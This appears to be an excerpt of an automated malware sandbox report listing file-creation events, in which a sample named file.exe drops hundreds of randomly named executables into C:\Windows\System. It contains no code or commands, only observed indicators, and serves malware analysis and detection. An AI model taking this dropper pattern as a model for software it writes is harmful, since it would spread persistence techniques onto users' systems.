Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xyokMuX.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gCZFmUf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DtVOaSb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ArNQyZf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\izzcVgF.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eXUokzg.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YnfMwga.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\caYiRYR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RgcKJVt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VGaSwYr.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sOGcIfs.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uRBSbtU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HuKkgJY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FHjAcHx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vREuzRr.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WlVmTit.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VwIvzCk.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XAgYYqB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UiAsnNy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QdDnaqt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ftWkAMN.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PRQFErV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NyhRMmW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DTVvNoy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fYMwhpS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UQPgIol.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\snZBbmy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CoTJSDT.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mWAGJFM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sPniyBl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HUohYxb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tRGqWXW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\chBMsUn.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tXVZMjj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sGYPztO.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dCnJkoQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GoSpvOG.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JCZRmvQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zzbooXY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sJZigTD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XWzPvUm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yXkrKHV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bsgTRXG.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pMMnfcQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kPkYoOt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZlvPlxy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DBfMBcY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jYFqRXp.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NrRaZIJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NLJeLdM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IEswIyo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aBqatWR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kFAVWnk.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EMuPVcI.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gXwIlxx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eIXgzbs.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fIqTNJz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VgNRTsd.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\whRtinB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QZBRXHU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OVdNTki.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nKUJunm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PUqZmPS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ukkpYme.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IjDqKMU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PaGFrFU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rtBLYbw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hMvDOJd.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XJEUdeq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rKZvlov.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KeLPRxW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wnWUbPS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HbWODob.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HNocQDn.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MLxwqET.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gQbnwXn.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZXNyiNu.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LPMtFlZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AONeoTK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FoekgWP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\skgGGJN.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xVIixqx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ckHJCFb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NuxBytj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mXElbHo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rwUXwnj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wCJLXKb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EZbURBQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FgiIXgf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oCLXTVT.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pPLiGBV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RtRmRJz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aFpkhGM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rfpCYxf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ucDGEkw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SNcreuq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lVudyTV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JGfFPYZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xAzCYwU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IBWzTMA.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rDRaLhy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lQcYvMS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NDapyRM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AQSffhY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SOFlTuM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jqUGnrw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BNgUfBr.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fhxlOMT.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NzANgdB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jzfTIlb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uJEYoyF.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gPTriDK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PrFZfUv.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZCyEzte.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QrBMIBp.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VsobEcA.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PLFTiIe.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PPOtBBY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SAfbgcC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\geBTNDq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BtXtEfY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NqPZXyD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rQJmlSe.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cLSDHvv.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UyqOZIb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OgBLDNx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\brplcms.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WvkREuJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AbenojY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hzIYZSD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pzbELEW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hyzwXgh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bxBimDh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\roZGxps.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PjowoJp.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xsirwHn.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WVsCsMZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kYjPKaN.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SUucMiy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ORmCcsC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HVhldsH.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VjXLpYb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZFvVqBc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JqFVNbS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VLekFWd.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\veVfAiw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FUwHkXo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mgbtojr.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aFbtfKK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\svRRwoZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SYLAfii.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KVgdAzq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wsmNUVo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cBoEBlV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qmcblFN.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YHgRCCe.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mBbgLGb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HKdVaSy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IpqVIyY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BwBweqn.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\otCfESI.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RCVCpIi.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sctmwAr.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iSmvfWm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XbARtow.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PdxLXDE.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yolnOnG.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OyxgWny.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LCScugy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wPprRzW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lBrohsB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pGmaKvE.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZPBkGsL.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mshbGSl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UmvuxvA.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ghXRScL.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qdErmhf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tyXEsEa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uBSPQKP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XBXKJRi.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GaSDvNs.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TVNHEGY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MCvhdFU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PABSWXd.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FaabrKu.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tWOQBIk.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LLELsGo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PZXDYlu.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mdMaqgD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rYIlnZs.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wWwDsEl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AOSuUmd.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CWLRJYu.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jmSIZKC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hhEeZzN.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mZnsuql.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LNyWtrn.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zJwJxgA.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UlGsoAn.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HjdahEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LFQLRaY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FlmGZHf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xneUGSK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sXBohAC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JdmbeCb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mlhNNPN.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xZqqKxJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rTrjeti.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\blOLvcj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RlLCkUy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\osHoaGO.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aIuDozC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pBTelAj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oUGjnOU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AbYjZgc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SMPCyPi.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UukRVui.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IllMHst.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GQclMdB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zijatif.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\azlLiBo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kZLhYQN.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qbpDLYy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\taxUqnx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lUMNxzw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dbbKTrK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IfltgVS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AcGKpcm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nQEuFBq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jKGWjaw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bqhvfzT.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lXopRHV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BwBatgB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RoWidmj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TUMoqsP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bNbsYkg.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MxuxZiI.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XwqrvQH.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KhBOMLK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wpDLrrl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PPiiELO.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wDtSEWJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GaBvkzp.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JXSvsmS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NegqmAo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VXPpbtK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qCLtsFy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wJAdaxF.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\irYOeCk.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pCGAIpP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uppASzn.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NlRtobK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PBaHEGS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eguTSJX.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\Ijxkdlp.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LjDLXkB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BBunKZg.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AhxTfFG.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CyMUqDA.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\llYFjTu.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PeQIxaU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WZKsVAe.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RbsRWaP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AeaVZHw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mNvvKIT.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FnKCSUL.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NqJQDKP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SjJDcPG.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aFAPcbx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HHhvFMA.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lGdlAZU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zDfFqMy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fuNSBKd.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ehBwKWj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tDWCTSE.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JwCXhnD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zOjeJhq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MpRFxmI.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mrLUdSp.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EfeLtDa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uEyemZA.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oOHCceb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ftaGKPi.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VjcJtJr.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lRTHLDQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\omINOHt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cnGOfUH.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sbbttaf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nCVveuw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gVfgQyo.exe	Jump to behavior
